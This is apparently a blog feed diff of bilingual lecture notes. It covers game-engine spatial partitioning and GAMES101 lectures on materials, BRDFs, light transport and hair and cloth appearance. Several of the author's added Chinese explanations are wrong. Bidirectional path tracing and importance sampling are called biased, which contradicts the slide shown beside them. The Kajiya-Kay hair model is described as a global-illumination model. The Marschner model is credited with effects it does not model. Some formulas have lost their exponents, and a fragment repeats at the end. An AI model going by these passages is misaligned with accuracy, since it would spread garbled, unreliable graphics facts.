    ​假设一个炮弹爆炸派发了一个事件,要让游戏中的所有 GO 接受这个事件并处理(是否在爆炸范围内),性能太低,需要作出一定的空间划分。

    • Simple space segmentation

      简单的空间划分

    png

    • Segmented space by object clusters

      按对象簇分割空间

    • Hierarchical segmentation

      分层细分

    png

    • Spatial Data Structures

      空间数据结构

    png

    ​划分空间的各个算法:

    • Bounding Volume Hierarchies (BVH)

      边界体积层次结构 (BVH)

    • Binary Space Partitioning (BSP)

      二进制空间分区(BSP)

    • Octree

      八叉树

    • Scene Graph

      场景图

    Takeaways

    • Everything is an object

      一切都是对象

    • Game object could be described in the component-based way

      游戏对象可以用基于组件的方式描述

    • States of game objects are updated in tick loops

      游戏对象的状态在滴答循环中更新

    • Game objects interact with each other via event mechanism

      游戏对象通过事件机制相互交互

    • Game objects are managed in a scene with efficient strategies

      游戏对象在场景中以有效的策略进行管理

    png

    ​对于一些存在父子层级关系的 GO。

    png

    ​Animation、Motor 和 Physics 三个 components 相互影响,如果互相派发消息,性能会不佳。

    png

    Immediate Event Sending or not

    ​是否立即发送事件

    ​可以设计一个“邮局”,收发消息由这个邮局控制,提升性能!

    ]]>
    @@ -2141,7 +2141,7 @@ /posts/GAMES101-%E7%8E%B0%E4%BB%A3%E8%AE%A1%E7%AE%97%E6%9C%BA%E5%9B%BE%E5%BD%A2%E5%AD%A6%E5%85%A5%E9%97%A8-%E9%97%AB%E4%BB%A4%E7%90%AA%EF%BC%886%EF%BC%89/ - 资源

    课程

    Lecture 17 Materials and Appearances

    The Appearance of Natural Materials

    ​天然材质的外观

    png

    ​大千世界,材质万千。


    What is Material in Computer Graphics?

    ​计算机图形学中的材质是什么?

    png

    Material == BRDF

    ​BRDF 是双向反射分布函数(Bidirectional Reflectance Distribution Function)的缩写。它是描述表面材质如何反射入射光的函数。BRDF 定义了给定入射方向和出射方向下,单位入射光能量在各个出射方向上的分布。简单来说,BRDF 描述了光线与表面相互作用时光的反射特性。

    What is this material?

    png

    Diffuse / Lambertian Material (BRDF)

    ​漫反射/朗伯材质 (BRDF)

    png


    Light is equally reflected in each output direction

    ​光线在每个输出方向上均等反射

    png

    Suppose the incident lighting is uniform:

    ​假设入射光是均匀的:

    $$\begin{aligned}
    L_o(\omega_o)& =\int_{H^2}f_rL_i(\omega_i)\cos\theta_i\mathrm{d}\omega_i \
    &=f_rL_i\int_{H^2}(\omega_i)\cos\theta_i\mathrm{d}\omega_i \
    &=\pi f_rL_i
    \end{aligned}$$

    $f_r=\frac{\rho}{\pi}$——albedo 反照率 (color)


    What is this material?

    png


    Glossy material (BRDF)

    ​光泽材质(BRDF)

    png


    What is this material?

    png


    Ideal reflective / refractive material (BSDF)*

    ​理想的反射/折射材料 (BSDF*)

    png


    Perfect Specular Reflection

    ​完美的镜面反射(只有反射没有折射)

    png

    png

    Top-down view (looking down on surface)
    自上而下的视图(俯视表面)

    png

    $$\omega_o+\omega_i=2\cos\theta\mathrm{~\vec{n}}=2(\omega_i\cdot\vec{\mathrm{n}})\vec{\mathrm{n}}$$

    $$\omega_o=-\omega_i+2(\omega_i\cdot\vec{\mathrm{n}})\vec{\mathrm{n}}$$


    Perfect Specular Reflection BRDF

    ​完美镜面反射 BRDF

    png


    Specular Refraction

    ​镜面折射

    In addition to reflecting off surface, light may be transmitted through surface.

    ​除了从表面反射外,光还可以穿过表面。

    Light refracts when it enters a new medium.

    ​光进入新介质时会发生折射。

    png


    Snell’ s Law

    ​斯涅尔定律

    Transmitted angle depends on

    ​透射角取决于

    index of refraction (IOR) for incident ray

    ​入射光线的折射率 (IOR)

    index of refraction (IOR) for exiting ray

    ​出射光线的折射率 (IOR)

    png

    $$\eta_i\sin\theta_i=\eta_t\sin\theta_t$$


    Law of Refraction

    ​折射定律

    png

    $$\begin{aligned}
    \eta_{i}\sin\theta_{i}& =\eta_t\sin\theta_t \
    \cos\theta_{t}& =\sqrt{1-\sin^2\theta_t} \
    &=\sqrt{1-\left(\frac{\eta_i}{\eta_t}\right)2\sin2\theta_i} \
    &=\sqrt{1-\left(\frac{\eta_i}{\eta_t}\right)2(1-\cos2\theta_i)}
    \end{aligned}$$

    Total internal reflection:

    ​全内反射

    When light is moving from a more optically dense medium to a less optically dense medium:

    ​当光从光密度较大的介质移动到光密度较小的介质时:

    $$1-\left(\frac{\eta_i}{\eta_t}\right)2(1-\cos2\theta_i)<0$$

    求得

    $$\frac{\eta_i}{\eta_t}>1$$

    Light incident on boundary from large enough angle will not exit medium.

    ​从足够大的角度入射到边界的光将不会离开介质。


    Snell’ 's Window / Circle

    png


    Fresnel Reflection / Term

    ​菲涅尔项

    Reflectance depends on incident angle (and polarization of light)

    ​反射率取决于入射角(和光的偏振)

    png

    This example: reflectance increases with grazing angle

    ​本例:反射率随观察角增加(变亮了)

    ​Fresnel Term(菲涅尔项)描述了光线与介质界面之间的反射和透射的比例。菲涅尔项是一个关于入射角度和折射率之间关系的函数,通常用来计算光线在介质表面的反射和透射的强度。

    ​在计算菲涅尔项时,通常使用菲涅尔方程来描述入射光线在介质表面的反射和透射情况。菲涅尔方程包括两个方面:垂直极化和平行极化。垂直极化表示光的电场矢量垂直于入射平面,而平行极化表示电场矢量在入射平面内。

    ​菲涅尔项的计算取决于入射角度、折射率以及光线的极化状态。在计算机图形学和光学模拟中,菲涅尔项通常被用于模拟材质的反射特性,以便更准确地模拟真实世界中的光线行为。


    Fresnel Term (Dielectric, $\eta=1.5$)

    ​菲涅尔项(介电体,$\eta=1.5$)

    png

    • S 极化(也称为垂直极化):在S极化状态下,入射光的电场矢量与入射平面垂直。当光线以 S 极化状态入射到介质表面时,其部分能量会被反射,而部分会被折射。S 极化通常与垂直于入射平面的反射和透射相关联。

    • P 极化(也称为平行极化):在P极化状态下,入射光的电场矢量位于入射平面内。与 S 极化类似,当光线以 P 极化状态入射到介质表面时,也会发生一部分反射和一部分折射。P极化通常与入射平面内的反射和透射相关联。

    • “unpolarized”(非偏振)光是指入射光中电场矢量的方向没有特定的取向,而是随机分布的。这意味着它包含了各种极化状态的光,无法用 S 极化或 P 极化来描述。非偏振光通常是自然光或由光源发出的常见光线,其电场矢量在所有可能的方向上均匀分布。在介质表面反射时,非偏振光的极化状态可能会因反射而发生改变,产生 S 极化和 P 极化的组合。

    ​与表面法线夹角越大,反射率越高。


    Fresnel Term (Conductor)

    ​菲涅尔项(导体)

    png


    Fresnel Term — Formulae

    ​菲涅尔项 — 公式

    Accurate: need to consider polarization

    ​准确:需要考虑极化

    $$R_s=\left|\frac{n_1\cos\theta_\mathrm{i}-n_2\cos\theta_\mathrm{t}}{n_1\cos\theta_\mathrm{i}+n_2\cos\theta_\mathrm{t}}\right|2=\left|\frac{n_1\cos\theta_\mathrm{i}-n_2\sqrt{1-\left(\frac{n_1}{n_2}\sin\theta_\mathrm{i}\right)2}}{n_1\cos\theta_\mathrm{i}+n_2\sqrt{1-\left(\frac{n_1}{n_2}\sin\theta_\mathrm{i}\right)^2}}\right|$$

    $$R_\mathrm{p}=\left|\frac{n_1\cos\theta_\mathrm{t}-n_2\cos\theta_\mathrm{i}}{n_1\cos\theta_\mathrm{t}+n_2\cos\theta_\mathrm{i}}\right|2=\left|\frac{n_1\sqrt{1-\left(\frac{n_1}{n_2}\sin\theta_\mathrm{i}\right)2}-n_2\cos\theta_\mathrm{i}}{n_1\sqrt{1-\left(\frac{n_1}{n_2}\sin\theta_\mathrm{i}\right)2}+n_2\cos\theta_\mathrm{i}}\right|2$$

    $$R_\mathrm{eff}=\frac12\left(R_\mathrm{s}+R_\mathrm{p}\right)$$

    Approximate: Schlick’ s approximation

    ​近似:Schlick 近似

    $$\begin{aligned}
    R(\theta)& =R_0+(1-R_0)(1-\cos\theta)^5 \
    R_{0}& =\left(\frac{n_1-n_2}{n_1+n_2}\right)^2
    \end{aligned}$$

    Microfacet Material

    ​微面片材质

    png

    ​从太空中看地球,看不出山脉的粗糙,反而是一片光滑的感觉。


    Microfacet Theory

    ​微面理论

    png

    Rough surface

    ​粗糙表面

    • Macroscale: flat & rough

      宏观尺度:平坦且粗糙

    • Microscale: bumpy & specular

      微观尺度:凹凸不平且镜面反射

    Individual elements of surface act like mirrors

    表面的各个元素就像镜子一样

    • Known as Microfacets

      称为微面

    • Each microfacet has its own normal

      每个微面都有自己的法线


    Key: the distribution of microfacets’ normals

    ​关键:微面元法线的分布

    png

    • Concentrated <==> glossy

      集中 <==> 光泽

    png

    • Spread <==> diffuse

      分散 <==> 漫射


    Microfacet BRDF

    • What kind of microfacets reflect $w_i$ to $w_o$? (hint: microfacets are mirrors)

      什么样的微表面能将 $w_i$ 反射到 $w_o$?(提示:微表面是镜子)

    png

    $f(\mathbf{i},\mathbf{o})=\frac{\mathbf{F}(\mathbf{i},\mathbf{h})\mathbf{G}(\mathbf{i},\mathbf{o},\mathbf{h})\mathbf{D}(\mathbf{h})}{4(\mathbf{n,i})(\mathbf{n,o})}$

    • $\mathbf{F}(\mathbf{i},\mathbf{h})$​:Fresnel term 菲涅尔项
    • $\mathbf{G(i,o,h)}$:shadowing-masking term 遮蔽掩蔽项(微表面反射时被另一个微表面所阻挡)
    • $\mathbf{D(h)}$​:distribution of normals(法线的分布)

    png


    Isotropic / Anisotropic Materials (BRDFs)

    ​各向同性/各向异性材料 (BRDF)

    png

    ​对不同方向光反射率不一样,称为各向异性材料(一般现实生活中,这种材料都是人造的)

    • Key: directionality of underlying surface

      关键词:底层表面的方向性

    png


    Anisotropic BRDFs

    ​各向异性 BRDF

    Reflection depends on azimuthal angle $\Phi$

    ​反射取决于方位角 $\Phi$

    $$f_r(\theta_i,\phi_i;\theta_r,\phi_r)\neq f_r(\theta_i,\theta_r,\phi_r-\phi_i)$$

    Results from oriented microstructure of surface, e.g., brushed metal

    ​来自表面定向微结构的结果,例如拉丝金属

    png

    png

    png

    png

    ​这玩意摸一摸还能改变它的纹路。


    Properties of BRDFs

    ​BRDF 的性质

    • Non-negativity

      非负性

    $$f_r(\omega_i\to\omega_r)\ge 0$$

    • Linearity

      线性叠加

    $$L_r(\mathrm{p},\omega_r)=\int_{H^2}f_r(\mathrm{p},\omega_i\to\omega_r)L_i(\mathrm{p},\omega_i)\cos\theta_i\mathrm{d}\omega_i$$

    png

    • Reciprocity principle

      可逆性

    $$f_r(\omega_r\to\omega_i)=f_r(\omega_i\to\omega_r)$$

    png

    • Energy conservation

      能量守恒

    $$\forall\omega_r\int_{H^2}f_r(\omega_i\to\omega_r)\cos\theta_i\mathrm{d}\omega_i\leq1$$

    ​一部分能量被吸收,$\le 1$

    • Isotropic vs. anisotropic
      • If isotropic, $f_r(\theta_i,\phi_i;\theta_r,\phi_r)=f_r(\theta_i,\theta_r,\phi_r-\phi_i)$
      • Then, from reciprocity, $f_r(\theta_i,\theta_r,\phi_r-\phi_i)=f_r(\theta_r,\theta_i,\phi_i-\phi_r)=f_r(\theta_i,\theta_r,|\phi_r-\phi_i|)$

    png

    Measuring BRDFs

    Measuring BRDFs: Motivation

    ​测量 BRDF:动机

    Avoid need to develop / derive models

    • Automatically includes all of the scattering effects present

    Can accurately render with real-world materials

    • Useful for product design, special effects, …

    Theory vs. practice:

    png


    Image-Based BRDF Measurement

    ​基于图像的 BRDF 测量

    png

    ​光线照着物体,相机绕物体一周。


    Measuring BRDFs: goniore flectometer

    ​测量 BRDF:测角反射计

    png


    Measuring BRDFs

    General approach:

    ​一般的做法:

    foreach outgoing direction wo 对于每个出射方向 wo
    move light to illuminate surface with a thin beam from wo 移动光线,使来自 wo 的细光束照亮表面
    for each incoming direction wi 对于每个入射方向 wi
    move sensor to be at direction wi from surface 移动传感器,使其位于距表面 wi 方向
    measure incident radiance 测量入射辐射度

    Improving efficiency:

    ​提高效率:

    • Isotropic surfaces reduce dimensionality from 4D to 3D

      各向同性表面将维度从 4D 降低到 3D

    • Reciprocity reduces # of measurements by half

      互易性将测量次数减少一半

    • Clever optical systems…

      智能光学系统……


    Challenges in Measuring BRDFs

    • Accurate measurements at grazing angles

      以掠射角进行精确测量

    • Important due to Fresnel effects

      由于菲涅尔效应而显得重要

    • Measuring with dense enough sampling to capture high frequency specularities

      使用足够密集的采样进行测量以捕捉高频镜面反射

    • Retro-reflection

      回射

    • Spatially-varying reflectance, …

      空间变化的反射率,…


    Representing Measured BRDFs

    ​表示测量的 BRDF

    Desirable qualities

    ​理想品质

    • Compact representation

      紧凑表示

    • Accurate representation of measured data

      测量数据的准确表示

    • Efficient evaluation for arbitrary pairs of directions

      对任意方向对的有效评估

    • Good distributions available for importance sampling

      可用于重要性抽样的良好分布


    Tabular Representation

    ​表格表示

    Store regularly-spaced samples in 将间隔均匀的样本存储在 $(\theta_i,\theta_o,|\phi_i-\phi_o|)$

    • Better: reparameterize angles to better match specularities

      更好:重新参数化角度以更好地匹配镜面反射

    Generally need to resample measured values to table

    ​通常需要将测量值重新采样到表中

    Very high storage requirements

    ​存储要求非常高

    png

    Lecture 18 Advanced Topics in Rendering

    Advanced Light Transport

    1. Unbiased light transport methods(无偏光线传输方法)
      • 这些方法旨在以最准确的方式模拟真实世界中光的行为,而不引入系统性的偏差。
      • 无偏方法通常通过追踪光线的路径并对其进行积分来实现。典型的无偏方法包括路径追踪(Path Tracing)、光子映射(Photon Mapping)和Metropolis光线追踪(Metropolis Light Transport)等。
      • 优点:可以获得高质量、逼真的图像,特别是对于复杂的光照和材质场景。
      • 缺点:由于需要追踪大量的光线路径并进行复杂的积分计算,无偏方法通常具有较高的计算成本。
    2. Biased light transport methods(有偏光线传输方法)
      • 这些方法通过引入一定的偏差或近似,以减少计算成本并加快渲染速度。
      • 有偏方法的设计目标是在保持图像质量的同时降低计算复杂度。
      • 典型的有偏方法包括辐射传输(Radiosity)、双向路径追踪(Bidirectional Path Tracing)、重要性采样(Importance Sampling)等。
      • 优点:通常比无偏方法更快速,尤其适用于实时渲染和交互式应用。
      • 缺点:可能会引入一定程度的图像噪声或伪影,因为近似方法可能无法完全准确地模拟真实世界中的光传输。

    ​ 总的来说,无偏光线传输方法追求最高的图像质量和真实性,但计算成本较高;而有偏光线传输方法则更注重在合理的计算复杂度下获得可接受的图像质量,适用于实时或大规模渲染场景。在实际应用中,通常会根据具体需求和性能要求选择适当的光线传输方法。

    • Unbiased light transport methods

      无偏光传输方法

      • Bidirectional path tracing (BDPT)

        双向路径追踪 (BDPT)

      • Metropolis light transport (MLT)

        Metropolis 光传输 (MLT)

    • Biased light transport methods

      偏光传输方法

      • Photon mapping

        光子映射

      • Vertex connection and merging (VCM)

        顶点连接和合并 (VCM)

      • Instant radiosity (VPL / many light methods)

        即时辐射度 (VPL / 多种光方法)


    Biased vs. Unbiased Monte Carlo Estimators

    • An unbiased Monte Carlo technique does not have any systematic error

      无偏蒙特卡罗技术没有任何系统误差

      • The expected value of an unbiased estimator will always be the correct value, no matter how many samples are used

        无论使用多少样本,无偏估计量的预期值始终是正确的值

    • Otherwise, biased

      否则,有偏差

      • One special case, the expected value converges to the correct value as infinite #samples are used — consistent

        一种特殊情况,随着使用无限数量的样本,预期值会收敛到正确值

    • We’ ll look again at this page after introducing Photon Mapping

      在介绍光子映射后,我们将再次查看此页面


    Bidirectional Path Tracing (BDPT)

    • Recall: a path connects the camera and the light

      回想一下:一条路径连接着相机和灯光

    • BDPT

      • Traces sub-paths from both the camera and the light

        追踪来自相机和灯光的子路径

      • Connects the end points from both sub-paths

        连接两个子路径的端点

    png

    ​BDPT 的基本思想是同时追踪从光源到摄像机的路径和从摄像机到场景中物体的路径,然后在这些路径上进行连接,以计算从光源到摄像机的光照传输。这种双向追踪方式为模拟复杂光照效果提供了更多的可能性。

    1. 从摄像机追踪路径
      • 从摄像机发射光线,追踪它们在场景中的路径。这种方法类似于传统路径追踪。
    2. 从光源追踪路径
      • 同时,从光源开始发射光线,追踪它们在场景中的传播。这种方法类似于光子映射等技术。
    3. 路径连接
      • 关键步骤是在摄像机路径和光源路径之间进行连接,形成一系列完整的路径。这些连接点的交汇位置和路径长短可以用来计算光照传输。

    png

    ​这是一个光路复杂的场景,主要光照都来自灯打到天花板后反射出来的光。

    • Suitable if the light transport is complex on the light’ s side

      适用于光传输在光端复杂的情况下

    • Difficult to implement & quite slow

      难以实现且速度较慢


    Metropolis Light Transport (MLT)

    png

    ​MLT 基于马尔可夫链蒙特卡洛算法 (Markov Chain Monte Carlo, MCMC)。它通过在渲染过程中构建一系列状态(或称为路径)并使用概率转移来搜索光线路径空间,以寻找高质量的渲染解决方案。

    1. 状态空间构建
      • MLT 从初始状态(或路径)开始,通过一系列随机变化逐步构建状态空间。这些状态描述了光线在场景中的传播路径,包括从光源到摄像机的直接和间接光照。
    2. 概率转移
      • MLT 使用概率转移算法来在状态空间中搜索,以决定接受或拒绝新状态。这个过程涉及到一系列基于状态之间差异的概率计算,以及利用接受率来平衡探索和收敛性能。
    3. 样本累积
      • MLT 通过对多个状态进行采样并根据它们的贡献权重来累积样本,以生成最终的渲染图像。这样的采样过程能够有效地降低图像中的噪声,并提高渲染的质量。
    • A Markov Chain Monte Carlo (MCMC) application

      马尔可夫链蒙特卡罗 (MCMC) 应用

      • Jumping from the current sample to the next with some PDF

        使用一些 PDF 从当前样本跳转到下一个样本

    • Very good at locally exploring difficult light paths

      非常擅长局部探索困难的光路

    • Key idea

      关键思想

      • Locally perturb an existing path to get a new path

        局部扰动现有路径以获得新路径


    png

    优点:

    • Works great with difficult light paths

      适用于困难的光路

    • Also unbiased

      也无偏差


    png

    缺点:

    • Difficult to estimate the convergence rate

      难以估计收敛速度

    • Does not guarantee equal convergence rate per pixel

      不能保证每个像素的收敛速度相等

    • So, usually produces “dirty” results

      因此,通常会产生“脏”结果

    • Therefore, usually not used to render animations

      因此,通常不用于渲染动画


    Photon Mapping

    ​光子映射

    png

    • A biased approach & A two-stage method

      有误差的方法和两阶段方法

    • Very good at handling Specular-Diffuse-Specular (SDS) paths and generating caustics

      非常擅长处理镜面反射-漫反射-镜面反射 (SDS) 路径和生成焦散


    Photon Mapping — Approach (variations apply)

    ​光子映射——方法(适用变化)

    ​Photon Mapping 主要分为两个阶段:光子发射和光子映射。

    1. 光子发射
      • 在这个阶段,光子从光源发射,并在场景中传播。这些光子以一定的概率与场景中的表面相交,并根据相交点的性质,如表面颜色、材质等,进行反射、折射或吸收。
    2. 光子映射
      • 在这个阶段,光子被映射到场景的光线路径上,并存储在特定的数据结构中,如光子图(photon map)。这个数据结构可以是基于光子碰撞点的空间分布,也可以是基于光子的能量和颜色等属性。
    3. 渲染
      • 在渲染阶段,相机射线从观察点出发,与场景中的表面相交。当相机射线与场景中的表面相交时,就可以使用光子图来估计光线的颜色和强度,从而计算出最终的图像颜色。

    png

    • Stage 1 — photon tracing

      第 1 阶段 — 光子追踪

      • Emitting photons from the light source, bouncing them around, then recording photons on diffuse surfaces

        从光源发射光子,使其四处反射,然后在漫反射表面上记录光子

    • Stage 2 — photon collection (final gathering)

      第 2 阶段 — 光子收集(最终聚集)

      • Shoot sub-paths from the camera, bouncing them around, until they hit diffuse surfaces

        从相机中发射子路径,让它们四处弹跳,直到它们击中漫反射表面


    Photon Mapping

    png

    • Calculation — local density estimation

      计算 — 局部密度估计

      • Idea: areas with more photons should be brighter

        想法:光子较多的区域应该更亮

      • For each shading point, find the nearest N photons. Take the surface area they over

        对于每个着色点,找到最近的 N 个光子。取它们覆盖的表面积


    png

    • Why biased?

      为什么有偏差?

    • Local Density estimation $\text dN / \text dA \ne \Delta N / \Delta A$

      局部密度估计 $\text dN / \text dA \ne \Delta N / \Delta A$

    • But in the sense of limit

      但在极限意义上

      • More photons emitted ->

        发射更多光子 ->

      • the same $N$ photons covers a smaller $\Delta A$ ->

        相同的 $N$ 个光子覆盖较小的 $\Delta A$ ->

      • $\Delta A$ is closer to $\text dA$

        $\Delta A$ 更接近 $\text dA$

    • So, biased but consistent!

      因此,有偏差但一致!

    • An easier understanding bias in rendering

      更容易理解渲染中的偏差

      • Biased == blurry

        偏差 == 模糊

      • Consistent == not blurry with infinite #samples

        一致 == 无限 #samples 不模糊

    • Why not do a “const range” search for density estimation?

      为什么不进行“常量范围”搜索以进行密度估计?


    Vertex Connection and Merging

    ​顶点连接与合并

    png

    • A combination of BDPT and Photon Mapping

      BDPT 和光子映射的结合

    • Key idea

      关键思想

      • Let’ s not waste the sub-paths in BDPT if their end points cannot be connected but can be merged

        如果 BDPT 中的子路径的端点无法连接但可以合并,那么就不要浪费它们

      • Use photon mapping to handle the merging of nearby “photons”

        使用光子映射来处理附近“光子”的合并


    Instant Radiosity (IR)

    ​即时辐射 (IR)

    png

    • Sometimes also called many-light approaches

      有时也称为多光方法

    • Key idea

      核心思想

      • Lit surfaces can be treated as light sources

        光照表面可视为光源

    • Approach

      方法

      • Shoot light sub-paths and assume the end point of each sub-path is a Virtual Point Light (VPL)

        拍摄光子路径并假设每个子路径的终点是虚拟点光源 (VPL)

      • Render the scene as usual using these VPLs

        使用这些 VPL 照常渲染场景

    png

    ​右图中,由于除以了一个极小的浮点数,导致边缘极亮。

    • Pros: fast and usually gives good results on diffuse scenes

      优点:速度快,通常在漫反射场景中效果良好

    • Cons:

      缺点

      • Spikes will emerge when VPLs are close to shading points

        当 VPL 靠近着色点时会出现尖峰

      • Cannot handle glossy materials

        无法处理光泽材质

    Advanced Appearance Modeling

    ​非表面模型是描述物体内部结构或几何形状的模型,不仅包括物体的外部表面,还包括内部的结构或体积。

    • Non-surface models

      非表面模型

      • Participating media

        参与介质

      • Hair / fur / fiber (BCSDF)

        头发/毛皮/纤维 (BCSDF)

      • Granular material

        颗粒材料

    ​表面模型是描述物体外部表面的模型,通常由一系列的表面片段或曲面组成。

    • Surface models

      表面模型

      • Translucent material (BSSRDF)

        半透明材料 (BSSRDF)

      • Cloth

        布料

      • Detailed material (non-statistical BRDF)

        详细材料 (非统计 BRDF)

    • Procedural appearance

      程序外观

    Non-Surface Models

    ​非表面模型


    Participating Media

    ​粒子媒介

    png

    ​非表面模型范例:Fog 和 Cloud。

    png

    • At any point as light travels through a participating medium, it can be (partially) absorbed and scattered.

      光在穿过参与介质的任何时刻都会被(部分)吸收和散射。

    png

    • Use Phase Function to describe the angular distribution of light scattering at any point $x$ within participating media.

      使用相位函数描述参与介质中任意点 $x$ 的光散射的角度分布。


    Participating Media: Rendering

    png

    • Randomly choose a direction to bounce

      随机选择一个方向进行反弹

    • Randomly choose a distance to go straight

      随机选择一个距离进行直线运动

    • At each ‘shading point’, connect to the light

      在每个“阴影点”处,连接到灯光


    Participating Media: Application

    png


    Hair Appearance

    ​毛发材质

    png


    Kajiya-Kay Model

    ​Kajiya-Kay 模型是一种经典的计算机图形学模型,用于模拟光照在物体表面的反射和折射过程。这个模型由Jim Kajiya和Tim Kay在1989年提出,是计算机图形学中重要的全局照明模型之一。

    Kajiya-Kay 模型的基本原理:

    ​Kajiya-Kay 模型基于渲染方程(Rendering Equation),它描述了光照在场景中的传播和交互过程。这个方程表达了在某一点的表面上观察到的辐射强度与该点表面上各个方向上的入射光线、表面材质的反射性质和环境光之间的关系。

    ​Kajiya-Kay 模型基于渲染方程,通过对方程中的光照传播和反射过程进行近似和简化,提供了一种实用的方法来计算逼真的图像。

    Kajiya-Kay 模型的主要特点:

    1. 表面属性表示:模型考虑了表面的漫反射、镜面反射和折射等属性,能够模拟各种类型表面的光照行为。
    2. 局部光照模型:Kajiya-Kay 模型采用了局部光照模型,即在计算每个表面点的照明时只考虑场景中的局部光线而不考虑全局光照效应。
    3. 环境光影响:除了考虑直接光照之外,模型还考虑了环境光对物体表面的影响,使得渲染结果更加逼真。

    png

    png

    ​使用 Kajiya-Kay Model 渲染头发的效果图。


    Marschner Model

    ​Marschner 模型是一种用于模拟人类头发或其他细长纤维的光照行为的计算机图形学模型。它由 Steve Marschner 等人在 2003 年提出,是一种基于物理的模型,旨在更准确地描述头发等细长纤维的外观。

    Marschner 模型的基本原理:

    ​Marschner 模型基于头发纤维的微观结构和光的物理性质,考虑了头发内部的散射、吸收和折射等光学效应,以及表面的漫反射、镜面反射和透射等效应。

    Marschner 模型的主要特点:

    1. 多层次模型:Marschner 模型将头发纤维划分为多个层次,包括表面层、皮层和髓质层,每一层都具有不同的光学特性和光学响应。
    2. 光学效应建模:模型考虑了头发内部的多次散射和折射过程,以及表面的漫反射、镜面反射和透射等效应,使得渲染结果更加逼真。
    3. 色彩衍射:Marschner 模型能够模拟头发纤维在光照下产生的色彩衍射效应,使得头发的颜色在不同的光照条件下呈现出细微的变化。
    4. 动态效果:模型还考虑了头发纤维的运动和形变对光照行为的影响,能够生成动态的头发效果。

    png

    png

    • Glass-like cylinder

      玻璃状圆柱体

    png

    • 3 types of light interactions: R, TT, TRT

      3 种光相互作用:R、TT、TRT

      (R: reflection, T: transmission)

    (R:反射,T:透射)

    png


    Hair Appearance Model: Application

    png


    Fur Appearance — As Human Hair

    ​毛皮外观——作为人类头发

    • Cannot represent diffusive and saturated appearance

      无法呈现弥散和饱和的外观(用人类头发模型来描述动物毛发效果并不真实)

    png


    Human Hair vs Animal Fur

    png

    ​人类毛发结构与动物毛发结构不太一样。

    • Common for hair/fur fibers

      常见于毛发/毛皮纤维

      • Cuticle

        角质层

        • Covered with scales

          覆盖有鳞片

      • Medulla

        髓质

        • Complex structure

          结构复杂

        • Scatters light

          散射光线

      • Cortex

        皮质

        • Contains pigments

          含有色素

        • Absorbs light

          吸收光线


    Importance of Medulla

    ​髓质层的重要性(让毛发更具光泽)

    png

    png


    Double Cylinder Model

    ​双重圆柱体模型

    png


    Double Cylinder Model — Lobes

    png

    png

    png

    ​这张图渲染一帧要 36.9min。

    png


    Granular Material

    ​颗粒材质

    • What is granular material?

    png

    png

    Can we avoid explicit modeling of all granules?

    ​我们能否避免对所有粒子进行显式建模?

    • Yes with procedural definition.

      是的,通过程序定义。

    png

    Surface Models

    png

    ​接下来处理这种 Translucent Material 半透明的材质。


    Subsurface Scattering

    ​次表面散射

    png

    • Visual characteristics of many surfaces caused by light exiting at different points than it enters

      由于光线从不同点射出和射入,导致许多表面的视觉特征

      • Violates a fundamental assumption of the BRDF

        违反了 BRDF 的基本假设

    png


    Scattering Functions

    ​散射函数

    • BSSRDF: generalization of BRDF; exitant radiance at one point due to incident differential irradiance at another point:

      BSSRDF:BRDF 的推广;某一点的出射辐射度是由于另一点的入射差分辐照度引起的:

    $$S(x_i,\omega_i,x_o,\omega_o)$$

    • Generalization of rendering equation: integrating over all points on the surface and all directions (!)

      渲染方程的推广:对表面上所有点和所有方向进行积分(!)

    $$L(x_o,\omega_o)=\int_A\int_{H^2}S(x_i,\omega_i,x_o,\omega_o)L_i(x_i,\omega_i)\cos\theta_i\mathrm d\omega_i\mathrm dA$$

    png


    Dipole Approximation [Jensen et al. 2001]

    • Approximate light diffusion by introducing two point sources.

      通过引入两个点源来近似光扩散。

    png

    ​BRDF 与 BSSRDF 效果对比:

    png

    png

    png

    png


    Cloth

    png

    A collection of twisted fibers!

    ​扭曲纤维的集合!

    Two levels of twist

    ​两层扭曲

    • Woven or knitted

      机织或针织

    png


    Cloth: Render as Surface

    png

    • Given the weaving pattern, calculate the overall behavior

      给定编织模式,计算整体行为

    • Render using a BRDF

      使用 BRDF 进行渲染

    png

    Render as Surface — Limitation

    png

    ​这个模型对尼龙好使,对天鹅绒不好使。


    Cloth: Render as Participating Media

    ​将布料作为参与媒介

    png

    • Properties of individual fibers & their distribution -> scattering parameters

      单个纤维的属性及其分布 -> 散射参数

    • Render as a participating medium

      作为参与介质进行渲染


    Cloth: Render as Actual Fibers

    png

    • Render every fiber explicitly!

      每根纤维地渲染!啊!计算量爆炸!


    Cloth: Demo & Application

    png


    Detailed Appearance: Motivation

    ​详细外观:动机

    png

    • Not looking realistic, why?

      看上去并不真实,为什么?表面太完美了,没有划痕,反而不够真实。


    Real world is more complicated

    ​现实世界更加复杂

    png

    png


    Recap: Microfacet BRDF

    ​回顾:微面片 BRDF

    png

    Surface = Specular microfacets + Statistical normals

    表面 = 镜面微表面 + 统计法线

    $$f(\mathbf{i},\mathbf{o})=\frac{\mathbf{F}(\mathbf{i},\mathbf{h})\mathbf{G}(\mathbf{i},\mathbf{o},\mathbf{h})\mathbf{D}(\mathbf{h})}{4(\mathbf{n},\mathbf{i})(\mathbf{n},\mathbf{o})}$$

    • $\mathbf{D}(\mathbf{h})$:

      NDF: Normal Distribution Function

      法线分布函数


    Statistical NDF vs. Actual NDF

    png

    ​将法线变得有锯齿。


    Define details

    png

    ​法线坑坑洼洼的。渲染?太难了!


    Difficult path sampling problem

    ​困难路径采样问题

    png

    ​好多射线都 miss 了,浪费了运算资源。


    Solution: BRDF over a pixel

    ​解决方案:像素上的 BRDF

    png

    Detailed / Glinty Material

    ​细致/闪亮材质

    png


    Recent Trend: Wave Optics

    ​近期趋势:波动光学

    ​光是有波粒二象性的,当光透过极小的空隙后,光就不可视为直线传播,就会产生其它颜色的小光斑。

    png

    png

    Procedural Appearance

    png

    • Can we define details without textures?

      我们可以在不使用纹理的情况下定义细节吗?

      • Yes! Compute a noise function on the fly.

        是的!动态计算噪声函数。(纹理是用函数计算出来的)

      • 3D noise ->internal structure if cut or broken

        3D 噪音 -> 内部结构如有切割或破损(依然可以显示出纹理)

      • Thresholding (noise -> binary noise)

        阈值(噪声 -> 二元噪声)

    ]]>
    + 资源

    课程

    Lecture 17 Materials and Appearances

    The Appearance of Natural Materials

    ​天然材质的外观

    png

    ​大千世界,材质万千。


    What is Material in Computer Graphics?

    ​计算机图形学中的材质是什么?

    png

    Material == BRDF

